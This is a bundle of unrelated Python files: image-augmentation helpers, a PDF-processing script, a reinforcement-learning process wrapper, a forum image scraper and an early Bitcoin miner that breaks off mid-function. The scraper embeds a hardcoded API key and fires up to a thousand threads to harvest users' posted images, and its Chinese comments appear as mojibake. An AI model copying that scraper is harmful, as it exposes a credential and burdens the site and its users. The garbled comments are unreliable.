# We instantiate a current/global random state here once.
# One can also call np.random, but that is (in contrast to np.random.RandomState)
# a module and hence cannot be copied via deepcopy. That's why we use RandomState
# here (and in all augmenters) instead of np.random.
CURRENT_RANDOM_STATE = np.random.RandomState(42)
def is_np_array(val):
return isinstance(val, (np.ndarray, np.generic))
def is_single_integer(val):
return isinstance(val, numbers.Integral)
def is_single_float(val):
return isinstance(val, numbers.Real) and not is_single_integer(val)
def is_single_number(val):
return is_single_integer(val) or is_single_float(val)
def is_iterable(val):
return isinstance(val, (tuple, list))
def is_string(val):
return isinstance(val, str) or isinstance(val, unicode)
def is_integer_array(val):
return issubclass(val.dtype.type, np.integer)
def current_random_state():
return CURRENT_RANDOM_STATE
def new_random_state(seed=None, fully_random=False):
if seed is None:
if not fully_random:
# sample manually a seed instead of just RandomState(),
# because the latter one
# is way slower.
seed = CURRENT_RANDOM_STATE.randint(0, 10**6, 1)[0]
return np.random.RandomState(seed)
def dummy_random_state():
return np.random.RandomState(1)
def copy_random_state(random_state, force_copy=False):
if random_state == np.random and not force_copy:
return random_state
else:
rs_copy = dummy_random_state()
orig_state = random_state.get_state()
rs_copy.set_state(orig_state)
return rs_copy
# TODO
# def from_json(json_str):
# pass
def imresize_many_images(images, sizes=None, interpolation=None):
s = images.shape
assert len(s) == 4, s
nb_images = s[0]
im_height, im_width = s[1], s[2]
nb_channels = s[3]
height, width = sizes[0], sizes[1]
if height == im_height and width == im_width:
return np.copy(images)
ip = interpolation
assert ip is None or ip in ["nearest", "linear", "area", "cubic", cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_AREA, cv2.INTER_CUBIC]
if ip is None:
if height > im_height or width > im_width:
ip = cv2.INTER_AREA
else:
ip = cv2.INTER_LINEAR
elif ip in ["nearest", cv2.INTER_NEAREST]:
ip = cv2.INTER_NEAREST
elif ip in ["linear", cv2.INTER_LINEAR]:
ip = cv2.INTER_LINEAR
elif ip in ["area", cv2.INTER_AREA]:
ip = cv2.INTER_AREA
elif ip in ["cubic", cv2.INTER_CUBIC]:
ip = cv2.INTER_CUBIC
else:
raise Exception("Invalid interpolation order")
result = np.zeros((nb_images, height, width, nb_channels), dtype=np.uint8)
for img_idx in sm.xrange(nb_images):
result_img = cv2.resize(images[img_idx], (width, height), interpolation=ip)
if len(result_img.shape) == 2:
result_img = result_img[:, :, np.newaxis]
result[img_idx] = result_img
return result
def imresize_single_image(image, sizes, interpolation=None):
grayscale = False
if image.shape == 2:
grayscale = True
image = image[:, :, np.newaxis]
assert len(image.shape) == 3, image.shape
rs = imresize_many_images(image[np.newaxis, :, :, :], sizes, interpolation=interpolation)
if grayscale:
return np.squeeze(rs[0, :, :, 0])
else:
return rs[0, ...]
def draw_grid(images, rows=None, cols=None):
if is_np_array(images):
assert len(images.shape) == 4
else:
assert is_iterable(images)
nb_images = len(images)
cell_height = max([image.shape[0] for image in images])
cell_width = max([image.shape[1] for image in images])
channels = set([image.shape[2] for image in images])
assert len(channels) == 1
nb_channels = list(channels)[0]
if rows is None and cols is None:
rows = cols = int(math.ceil(math.sqrt(nb_images)))
elif rows is not None:
cols = int(math.ceil(nb_images / rows))
elif cols is not None:
rows = int(math.ceil(nb_images / cols))
assert rows * cols >= nb_images
width = cell_width * cols
height = cell_height * rows
grid = np.zeros((height, width, nb_channels))
cell_idx = 0
for row_idx in sm.xrange(rows):
for col_idx in sm.xrange(cols):
if cell_idx < nb_images:
image = images[cell_idx]
cell_y1 = cell_height * row_idx
cell_y2 = cell_y1 + image.shape[0]
cell_x1 = cell_width * col_idx
cell_x2 = cell_x1 + image.shape[1]
grid[cell_y1:cell_y2, cell_x1:cell_x2, :] = image
cell_idx += 1
return grid
def show_grid(images, rows=None, cols=None):
grid = draw_grid(images, rows=rows, cols=cols)
misc.imshow(grid)
class HooksImages(object):
"""
# TODO
"""
def __init__(self, activator=None, propagator=None, preprocessor=None, postprocessor=None):
self.activator = activator
self.propagator = propagator
self.preprocessor = preprocessor
self.postprocessor = postprocessor
def is_activated(self, images, augmenter, parents, default):
if self.activator is None:
return default
else:
return self.activator(images, augmenter, parents, default)
# TODO is a propagating hook necessary? seems to be covered by activated
# hook already
def is_propagating(self, images, augmenter, parents, default):
if self.propagator is None:
return default
else:
return self.propagator(images, augmenter, parents, default)
def preprocess(self, images, augmenter, parents):
if self.preprocessor is None:
return images
else:
return self.preprocessor(images, augmenter, parents)
def postprocess(self, images, augmenter, parents):
if self.postprocessor is None:
return images
else:
return self.postprocessor(images, augmenter, parents)
class HooksKeypoints(HooksImages):
pass
class Keypoint(object):
"""
# TODO
"""
def __init__(self, x, y):
# these checks are currently removed because they are very slow for some
# reason
#assert is_single_integer(x), type(x)
#assert is_single_integer(y), type(y)
self.x = x
self.y = y
def project(self, from_shape, to_shape):
if from_shape[0:2] == to_shape[0:2]:
return Keypoint(x=self.x, y=self.y)
else:
from_height, from_width = from_shape[0:2]
to_height, to_width = to_shape[0:2]
x = int(round((self.x / from_width) * to_width))
y = int(round((self.y / from_height) * to_height))
return Keypoint(x=x, y=y)
def shift(self, x, y):
return Keypoint(self.x + x, self.y + y)
def __repr__(self):
return self.__str__()
def __str__(self):
return "Keypoint(x=%d, y=%d)" % (self.x, self.y)
class KeypointsOnImage(object):
def __init__(self, keypoints, shape):
self.keypoints = keypoints
if is_np_array(shape):
self.shape = shape.shape
else:
assert isinstance(shape, (tuple, list))
self.shape = tuple(shape)
@property
def height(self):
return self.shape[0]
@property
def width(self):
return self.shape[1]
def on(self, image):
if is_np_array(image):
shape = image.shape
else:
shape = image
if shape[0:2] == self.shape[0:2]:
return self.deepcopy()
else:
keypoints = [kp.project(self.shape, shape) for kp in self.keypoints]
return KeypointsOnImage(keypoints, shape)
def draw_on_image(self, image, color=[0, 255, 0], size=3, copy=True, raise_if_out_of_image=False):
if copy:
image = np.copy(image)
height, width = image.shape[0:2]
for keypoint in self.keypoints:
y, x = keypoint.y, keypoint.x
if 0 <= y < height and 0 <= x < width:
x1 = max(x - size//2, 0)
x2 = min(x + 1 + size//2, width - 1)
y1 = max(y - size//2, 0)
y2 = min(y + 1 + size//2, height - 1)
image[y1:y2, x1:x2] = color
else:
if raise_if_out_of_image:
raise Exception("Cannot draw keypoint x=%d, y=%d on image with shape %s." % (y, x, image.shape))
return image
def shift(self, x, y):
keypoints = [keypoint.shift(x=x, y=y) for keypoint in self.keypoints]
return KeypointsOnImage(keypoints, self.shape)
def get_coords_array(self):
result = np.zeros((len(self.keypoints), 2), np.int32)
for i, keypoint in enumerate(self.keypoints):
result[i, 0] = keypoint.x
result[i, 1] = keypoint.y
return result
@staticmethod
def from_coords_array(coords, shape):
assert is_integer_array(coords), coords.dtype
keypoints = [Keypoint(x=coords[i, 0], y=coords[i, 1]) for i in sm.xrange(coords.shape[0])]
return KeypointsOnImage(keypoints, shape)
def to_keypoint_image(self):
assert len(self.keypoints) > 0
height, width = self.shape[0:2]
image = np.zeros((height, width, len(self.keypoints)), dtype=np.uint8)
for i, keypoint in enumerate(self.keypoints):
y = keypoint.y
x = keypoint.x
if 0 <= y < height and 0 <= x < width:
image[y, x, i] = 255
return image
@staticmethod
def from_keypoint_image(image, if_not_found_coords={"x": -1, "y": -1}, threshold=1):
assert len(image.shape) == 3
height, width, nb_keypoints = image.shape
drop_if_not_found = False
if if_not_found_coords is None:
drop_if_not_found = True
if_not_found_x = -1
if_not_found_y = -1
elif isinstance(if_not_found_coords, (tuple, list)):
assert len(if_not_found_coords) == 2
if_not_found_x = if_not_found_coords[0]
if_not_found_y = if_not_found_coords[1]
elif isinstance(if_not_found_coords, dict):
if_not_found_x = if_not_found_coords["x"]
if_not_found_y = if_not_found_coords["y"]
else:
raise Exception("Expected if_not_found_coords to be None or tuple or list or dict, got %s." % (type(if_not_found_coords),))
keypoints = []
for i in sm.xrange(nb_keypoints):
maxidx_flat = np.argmax(image[..., i])
maxidx_ndim = np.unravel_index(maxidx_flat, (height, width))
found = (image[maxidx_ndim[0], maxidx_ndim[1], i] >= threshold)
if found:
keypoints.append(Keypoint(x=maxidx_ndim[1], y=maxidx_ndim[0]))
else:
if drop_if_not_found:
pass # dont add the keypoint to the result list, i.e. drop it
else:
keypoints.append(Keypoint(x=if_not_found_x, y=if_not_found_y))
return KeypointsOnImage(keypoints, shape=(height, width))
def copy(self):
return copy.copy(self)
def deepcopy(self):
# for some reason deepcopy is way slower here than manual copy
#return copy.deepcopy(self)
kps = [Keypoint(x=kp.x, y=kp.y) for kp in self.keypoints]
return KeypointsOnImage(kps, tuple(self.shape))
def __repr__(self):
return self.__str__()
def __str__(self):
#print(type(self.keypoints), type(self.shape))
return "KeypointOnImage(%s, shape=%s)" % (str(self.keypoints), self.shape)
# TODO
"""
class BackgroundAugmenter(object):
def __init__(self, image_source, augmenter, maxlen, nb_workers=1):
self.augmenter = augmenter
self.maxlen = maxlen
self.result_queue = multiprocessing.Queue(maxlen)
self.batch_workers = []
for i in range(nb_workers):
worker = multiprocessing.Process(target=self._augment, args=(image_source, augmenter, self.result_queue))
worker.daemon = True
worker.start()
self.batch_workers.append(worker)
def join(self):
for worker in self.batch_workers:
worker.join()
def get_batch(self):
return self.result_queue.get()
def _augment(self, image_source, augmenter, result_queue):
batch = next(image_source)
self.result_queue.put(augmenter.transform(batch))
"""
|
pickles_main_mp.py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Mar 2 08:59:30 2020
@author: T1Sousan
"""
#Libraies
from io import StringIO
import time
from bs4 import BeautifulSoup
from tika import parser
import pandas as pd
from collections import Counter
import pandas as pd
import sys
import multiprocessing
sys.path.insert(0, 'H:/GitHub/Extract-Tables-With-Titles')
import pickles_functions_mp as pf
import glob
#
if __name__ == "__main__":
#Get unique project names
#Open Index 2 for each PDF
# #updated on Feb 27 post line 3 addition
# index2_path = 'F:/Environmental Baseline Data/Version 4 - Final/Indices/Index 2 - PDFs for Major Projects with ESAs.csv'
# index2 = pd.read_csv(index2_path)
# index2['Application title short'].unique()
#
# subset_list_pdf = list(index2['DataID_pdf'])
subset_list_pdf_full = ['F:/Environmental Baseline Data/Version 4 - Final/PDF/' + x.split('\\')[-1] for x in glob.glob('F:/Environmental Baseline Data/Version 4 - Final/PDF/*.pdf')]
#a = get_argument(subset_list_pdf_full)
starttime = time.time()
processes = []
for i in subset_list_pdf_full:
try:
p = multiprocessing.Process(target= pf.get_pickles_, args=(i,))
processes.append(p)
p.start()
except:
print("file {} is not present in the folder".format(i.split('/')[-1]))
continue
for process in processes:
process.join()
print('That took {} seconds'.format(time.time() - starttime))
if __name__ == "__main__":
subset_list_pdf_full = ['F:/Environmental Baseline Data/Version 4 - Final/PDF/' + x.split('\\')[-1] for x in glob.glob('F:/Environmental Baseline Data/Version 4 - Final/PDF/*.pdf')]
#a = get_argument(subset_list_pdf_full)
starttime = time.time()
processes = []
for i in subset_list_pdf_full:
try:
pf.rotate_pdf(i)
except Exception:
print(f'{i} failed')
pass
print('That took {} seconds'.format(time.time() - starttime))
########################################################################################################################################
if __name__ == '__main__':
# list of full paths to pdfs
subset_list_pdf_full = ['F:/Environmental Baseline Data/Version 4 - Final/PDF/'
+ x.split('\\')[-1] for x in glob.glob
('F:/Environmental Baseline Data/Version 4 - Final/PDF/*.pdf')]
subset_list_pdf_full = subset_list_pdf_full[0:40]
# Directory where the output pickle files are saved
path = 'H:/GitHub/tmp/'
# prepare arguments for multiprocessing
args = pf.get_argument(subset_list_pdf_full, path)
# timing the process-start
starttime = time.time()
# sequential
for arg in args:
try:
pf.pickle_pdf_xml(arg)
except Exception:
print(f'{i} failed')
pass
# multiprocessing
pool = multiprocessing.Pool()
# pool.map(pf.rotate_pdf, subset_list_pdf_full)
pool.map(pf.pickle_pdf_xml, args)
pool.close()
# time ends and dellta displayed
print('That took {} seconds'.format(time.time() - starttime))
with multiprocessing.Pool() as pool:
outputs = pool.map(mf.extract_tables_noname, args)
|
environment_process_wrapper.py
|
from tensorforce.environments import Environment
from multiprocessing import Process
from multiprocessing import Pipe
def worker(environment, conn2):
while True:
# Receive the environment method's name, and (optional) arguments
(name, *args, kwargs) = conn2.recv()
attr = object.__getattribute__(environment, name)
if hasattr(attr, '__call__'):
# Get what is returned by the method
result = attr(*args, **kwargs)
else:
# Get the attribute
result = attr
# Send this to the Wrapper
conn2.send(result)
class ProcessWrapper(Environment):
def __init__(self, environment):
super(ProcessWrapper, self).__init__()
# Instanciate a bidirectional Pipe
self.conn1, conn2 = Pipe(duplex=True)
# Start the worker process, which interacts directly with the environment
self.p = Process(target=worker, args=(environment, conn2))
self.p.start()
# To call a custom method of your environment
def __getattr__(self, name):
def wrapper(*args, **kwargs):
return self.send_environment(name, *args, **kwargs)
return wrapper
def send_environment(self, name, *args, **kwargs):
"""Send a request through the pipe, and wait for the answer message.
"""
to_send = (name, *args, kwargs)
# Send request
self.conn1.send(to_send)
# Wait for the result
result = self.conn1.recv()
return result
def close(self, *args, **kwargs):
self.p.join()
self.send_environment('close', *args, **kwargs)
def states(self, *args, **kwargs):
return self.send_environment('states', *args, **kwargs)
def actions(self, *args, **kwargs):
return self.send_environment('actions', *args, **kwargs)
def reset(self, *args, **kwargs):
return self.send_environment('reset', *args, **kwargs)
def execute(self, actions, *args, **kwargs):
return self.send_environment('execute', actions, *args, **kwargs)
|
huluxiaThirdflood_api.py
|
#!/usr/bin/python3
# encoding: utf-8
"""
@author: m1n9yu3
@license: (C) Copyright 2021-2023, Node Supply Chain Manager Corporation Limited.
@file: huluxiaThirdflood_api.py
@time: 2021/4/26 19:03
@desc:
"""
import os
import requests
import time
import json
import threading
from urllib import parse
# ๆไฝๆไปถ api
def mkdir_(path):
if not os.path.isdir(path):
os.mkdir(path)
def remove_(path):
if os.path.isfile(path):
os.remove(path)
def save_text(path, context):
"""ไฟๅญ txt ๆๆกฃ"""
with open(path, "a") as f:
f.write(str(context))
# ่ทๅๆฐๆฎๆไฝ
# ไปฃ็ ip ็ฌๅ
# proxies = {"http": "127.0.0.1:8889"}
proxies = {}
def get_json(url):
return requests.get(url, proxies=proxies).json()
def download_img(path, data, flag):
"""ๅพ็ไธ่ฝฝ ่ฏ่ฎบไธญๅพ็ๅไธปๅพๅพ็
:param flag:
"""
def download_signed_img(url):
""" ๅไธชๅพ็ไธ่ฝฝ"""
# print(urls)
url = url.replace(" ", "") # ๆฟๆข็ฉบๆ ผ
img_name = path + url.split("/")[-1]
if img_name.split('.')[-1] == 'ht':
img_name += '.png'
with open(img_name, 'wb') as f:
f.write(requests.get(url, proxies=proxies).content)
# print("็ฌๅๅฎๆ:", url)
if flag != 0:
return data
for i in data:
download_signed_img(i)
def download_video(path, url):
"""่ง้ขไธ่ฝฝ"""
return
response = requests.get(url)
with open(path, "wb") as f:
f.write(response.content)
def download_json_image(post_id, flag=''):
"""ๆฐๆฎ่งฃๆ๏ผๅนถไธ่ฝฝๅพ็."""
# ๅธๅญ่ฏฆ็ปไฟกๆฏ้พๆฅ
url = "http://floor.huluxia.com/post/detail/ANDROID/2.3?platform=2&market_id=tool_baidu&post_id={}&page_no={}"
try:
print(post_id, "ๅผๅง็ฌๅ")
page_num = 1
js_dir = ''
while page_num <= 50:
js = get_json(url.format(post_id, page_num))
# ๆๅฐๆต่ฏๆฐๆฎ
# print(url.format(post_id, page_num))
# print(js)
if js['msg'] == '่ฏ้ขไธๅญๅจ' or js['msg'] == '่ฏ้ขๆๅฑๅ็ฑปไธๅญๅจ':
return
# ๅคๆญ้กต ๆฏๅฆ็ปๆ
if page_num > 1:
if not js['comments']:
break
# ๅผๅงไฟๅญๅพ็ๆฐๆฎ
if page_num == 1:
# ๅๅปบ็ฎๅฝ
if flag != '':
js_dir = flag
mkdir_(js_dir)
else:
js_dir = './{}/'.format(js['post']['category']['title'])
mkdir_(js_dir) # ็ๅ็ฎๅฝ
js_dir += '{}/'.format(post_id)
mkdir_(js_dir) # post_id ็ฎๅฝ๏ผไบ็บง็ฎๅฝ
# ้้้ฆ้กตๅพ็
download_img(js_dir, js['post']['images'], 0)
txt_name = js_dir + "่ฏดๆ.txt"
# ๅนถๅฐ ๆฐๆฎ่ฟ่ก้้
save_text(txt_name, js['post']['title'] + '\n' + js['post']['detail'])
# ๅคๆญๆฏๅฆๆ่ง้ข ๏ผๆ่ง้ขไธ่ฝฝ่ง้ข
if js['post']['voice'] != "":
d = json.loads(js['post']['voice'])
download_video(js_dir + d['videofid'].split('/')[-1] + '.mp4', d['videohost'] + d['videofid'])
# ไฟๅญๆฏไธไธชๅธๅญ็ json ๆฐๆฎ
save_text(js_dir + "js.txt", js)
# ้้ ่ฏ่ฎบๅพ็
for i in js['comments']:
download_img(js_dir, i['images'], 0)
# ้้่ฏ่ฎบ ๆๅญ
page_num += 1
print(post_id, "็ฌๅ็ปๆ")
return
except Exception as e:
with open("log.txt", mode="a") as f:
content = "current:{} \npost_id: {}\n error_content:{} \n\n".format(
time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())), post_id, e)
f.write(content)
return
def parse_json(post_id, flag=''):
"""ๆฐๆฎ่งฃๆ๏ผๅนถไธ่ฝฝๅพ็."""
# ๅธๅญ่ฏฆ็ปไฟกๆฏ้พๆฅ
url = "http://floor.huluxia.com/post/detail/ANDROID/2.3?platform=2&market_id=tool_baidu&post_id={}&page_no={}"
try:
print(post_id, "ๅผๅง็ฌๅ")
page_num = 1
js_dir = ''
while page_num <= 50:
js = get_json(url.format(post_id, page_num))
# ๆๅฐๆต่ฏๆฐๆฎ
# print(url.format(post_id, page_num))
# print(js)
if js['msg'] == '่ฏ้ขไธๅญๅจ' or js['msg'] == '่ฏ้ขๆๅฑๅ็ฑปไธๅญๅจ':
return
# ๅคๆญ้กต ๆฏๅฆ็ปๆ
if page_num > 1:
if not js['comments']:
break
# ๅผๅงไฟๅญๅพ็ๆฐๆฎ
if page_num == 1:
# ้้้ฆ้กตๅพ็
download_img(js_dir, js['post']['images'], 0)
# ๅนถๅฐ ๆฐๆฎ่ฟ่ก้้
# ๅคๆญๆฏๅฆๆ่ง้ข ๏ผๆ่ง้ขไธ่ฝฝ่ง้ข
if js['post']['voice'] != "":
d = json.loads(js['post']['voice'])
download_video(js_dir + d['videofid'].split('/')[-1] + '.mp4', d['videohost'] + d['videofid'])
# ้้ ่ฏ่ฎบๅพ็
for i in js['comments']:
download_img(js_dir, i['images'], 0)
page_num += 1
print(post_id, "็ฌๅ็ปๆ")
return
except Exception as e:
with open("log.txt", mode="a") as f:
content = "current:{} \npost_id: {}\n error_content:{} \n\n".format(
time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())), post_id, e)
f.write(content)
return
def get_images_url(post_id, flag=''):
"""ๆฐๆฎ่งฃๆ๏ผๅนถไธ่ฝฝๅพ็."""
# ๅธๅญ่ฏฆ็ปไฟกๆฏ้พๆฅ
url = "http://floor.huluxia.com/post/detail/ANDROID/2.3?platform=2&market_id=tool_baidu&post_id={}&page_no={}"
try:
page_num = 1
js_dir = ''
image_url_list = []
while page_num <= 50:
js = get_json(url.format(post_id, page_num))
if js['msg'] == '่ฏ้ขไธๅญๅจ' or js['msg'] == '่ฏ้ขๆๅฑๅ็ฑปไธๅญๅจ':
return
# ๅคๆญ้กต ๆฏๅฆ็ปๆ
if page_num > 1:
if not js['comments']:
break
# ๅผๅงไฟๅญๅพ็ๆฐๆฎ
if page_num == 1:
# ้้้ฆ้กตๅพ็
image_url_list += download_img(js_dir, js['post']['images'], 1)
# ้้ ่ฏ่ฎบๅพ็
for i in js['comments']:
image_url_list += download_img(js_dir, i['images'], 1)
# ้้่ฏ่ฎบ ๆๅญ
page_num += 1
return image_url_list
except Exception as e:
with open("log.txt", mode="a") as f:
content = "current:{} \npost_id: {}\n error_content:{} \n\n".format(
time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())), post_id, e)
f.write(content)
return []
def set_proxy(proxy: dict):
"""็จไบ่ฎพ็ฝฎไปฃ็"""
global proxies
proxies = proxy
def multi_thread(idlist, path):
"""็บฟ็จๆงๅถ ๏ผ ไธๆฌก่ท 1000 ไธช็บฟ็จ"""
# for i in range(start_id, step+start_id):
# parse_json(url, start_id+i)
threads = []
for i in idlist:
threads.append(threading.Thread(target=get_images_url, args=(i, path)))
for i in threads:
i.start()
for i in threads:
i.join()
def ask_url(url, path, number=10):
i = 0
post_ids = []
js = get_json(url.format(i))
while True:
# posts ๆฒกๆๅ
ๅฎนๆถ๏ผ้ๅบ
if not js['posts']:
break
for post_id_i in js['posts']:
post_ids.append(post_id_i['postID'])
i += 1
# ๆๅฎ็ฌๅ้กตๆฐ
# print(post_ids)
number -= 1
if number % 10 == 0:
multi_thread(idlist=post_ids, path=path)
if number == 0:
break
post_ids = []
js = get_json(url.format(js['start']))
print("็ฌๅๅฎๆ, ๅ
ฑ{} ไธชๅธๅญ".format(i))
def search_key(keyword):
# ๆไพไธ็ป _key: 074A517999865CB0A3DC24034F244DEB1E23E1512BA28A8D07315737041A1E393A13114A41B9FCE24CBD95E0AF7E0C72DC99A8E24218CC70
# _key = input("่ฏท่พๅ
ฅ _key: ")
_key = "074A517999865CB0A3DC24034F244DEB1E23E1512BA28A8D07315737041A1E393A13114A41B9FCE24CBD95E0AF7E0C72DC99A8E24218CC70"
url = "http://floor.huluxia.com/post/search/ANDROID/2.1?platform=2&market_id=tool_baidu&_key" \
"=%s&start=1&count=20&cat_id=56&keyword=%s&flag=0" % (_key, parse.quote(keyword))
# print(url)
ask_url(url, 'search_result/')
def get_random_imageurl(num:int) -> list:
url = "http://floor.huluxia.com/post/list/ANDROID/2.1?platform=2&market_id=tool_baidu&start={}&count=20&cat_id=56&tag_id=0&sort_by=0"
i = 0
number = num
image_url_list = []
js = get_json(url.format(i))
if not js['posts']:
return []
post_list = js['posts']
while True:
# ๅคๆญๆฏๅฆไฝฟ็จๅฎๆฏ
if len(post_list) == 0:
js = get_json(url.format(js['start']))
if not js['posts']:
break
post_list = js['posts']
i = 0
image_url_list += get_images_url(post_list[i]['postID'])
i += 1
# ๆๅฎ็ฌๅ้กตๆฐ
number -= 1
if len(image_url_list) >= num:
break
# print(image_url_list)
# print("็ฌๅๅฎๆ, ๅ
ฑ{} ไธชๅธๅญ".format(i))
return image_url_list
'''
target : ็ฎๆ
http://floor.huluxia.com/post/detail/ANDROID/2.3?platform=2&market_id=tool_baidu&post_id={ๅธๅญid}&page_no={้กตๆฐ}
ๅธๅญid ไพๆฌก้ๅข
'''
def section_multi_thread(start_id, step):
"""็บฟ็จๆงๅถ ๏ผ ไธๆฌก่ท 1000 ไธช็บฟ็จ"""
# for i in range(start_id, step+start_id):
# parse_json(url, start_id+i)
threads = []
for i in range(step):
threads.append(threading.Thread(target=download_json_image, args=(start_id + i,)))
for i in threads:
i.start()
for i in threads:
i.join()
def section_get():
url = "http://floor.huluxia.com/post/detail/ANDROID/2.3?platform=2&market_id=tool_baidu&post_id={}&page_no={}"
# ๆถ้ๅๅงๅๆฐๆฎ
section = input("่ฏท่พๅ
ฅๅบ้ด: start-end (start >= 1, end > start)")
start = int(section.split('-')[0])
end = int(section.split('-')[1])
thread_num = int(input("่ฏท่พๅ
ฅ็บฟ็จๆฐ้:"))
# ๅผๅง็ฌๅ
step = 1000 # ่ฎพ็ฝฎ็บฟ็จๆฐ้
for i in range(start, end, thread_num):
# parse_json(url, i)
# ไธไธไธช็ฎๆ ๏ผๅฐ่ฏๅค็บฟ็จไผๅ
section_multi_thread(url, i, thread_num)
# ็ฌๅ่ฎฐๅฝ ๏ผ 2021.1.13, 8:00 ็ฌๅๅฐ 24000 post_id
def get_leg():
"""่ทๅ็พ่
ฟๅพ็"""
path = input("่ฏท่พๅ
ฅ็ฌๅ่ทฏๅพ๏ผไป
ๆฏๆๅทฒๅญๅจ็็ฎๅฝ๏ผๆ่
ๅ็บง็ฎๅฝ:")
try:
page_num = int(input("่ฏท่พๅ
ฅ้กตๆฐ,้กตๆฐ่ถๅคง๏ผ็ฌ็่ถๆ
ข:"))
except ValueError:
page_num = 5
url = "http://floor.huluxia.com/post/list/ANDROID/2.1?platform=2&market_id=tool_baidu&start={}&count=20&cat_id=56&tag_id=0&sort_by=0"
if path[-1] != '/':
path += '/'
ask_url(url, path, page_num)
def get_post_id():
post_id = int(input("่ฏท่พๅ
ฅ post id๏ผ"))
path = input("่ฏท่พๅ
ฅ็ฎๅฝ,่พๅ
ฅq ,ๅไฟๅญๅฐ้ป่ฎค็ฎๅฝ๏ผ")
if path == 'q':
download_json_image(post_id, './img/')
else:
download_json_image(post_id, './{}/'.format(path))
def menu():
# ๆธ
้คๆฅๅฟ ็ฌๅ่ฟ็จไธญๅบ็ฐ็้่ฏฏ
remove_("log.txt")
"""ไธปๆจกๅ่ๅ๏ผๅฐๆๆๅ่ฝ้ๅๆไธไธช่ๅ"""
while True:
print("------่ๅ-------")
print("1. ๅบ้ด็ฌๅ")
print("2. ็ฌๅ็พ่
ฟๅพ็")
print("3. ๅ
ณ้ฎๅญ็ฌๅ")
print("4. ็ฌๅ post_id ๅฏนๅบ็ๅธๅญ")
print("5. ่ฎพ็ฝฎไปฃ็")
print("q. ้ๅบ่ๅ")
set_proxy(None)
flag = input("่ฏท่พๅ
ฅไฝ ็้้กน:")
if flag == '1':
section_get()
elif flag == '2':
get_leg()
elif flag == '3':
keyword = input("่ฏท่พๅ
ฅๅ
ณ้ฎๅญ:")
search_key(keyword)
elif flag == '4':
get_post_id()
elif flag == '5':
http_ip = input("่ฏท่พๅ
ฅ: ไปฃ็ipๅฐๅ:็ซฏๅฃ ")
set_proxy({"http": http_ip})
elif flag == 'q':
break
if __name__ == '__main__':
pass
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
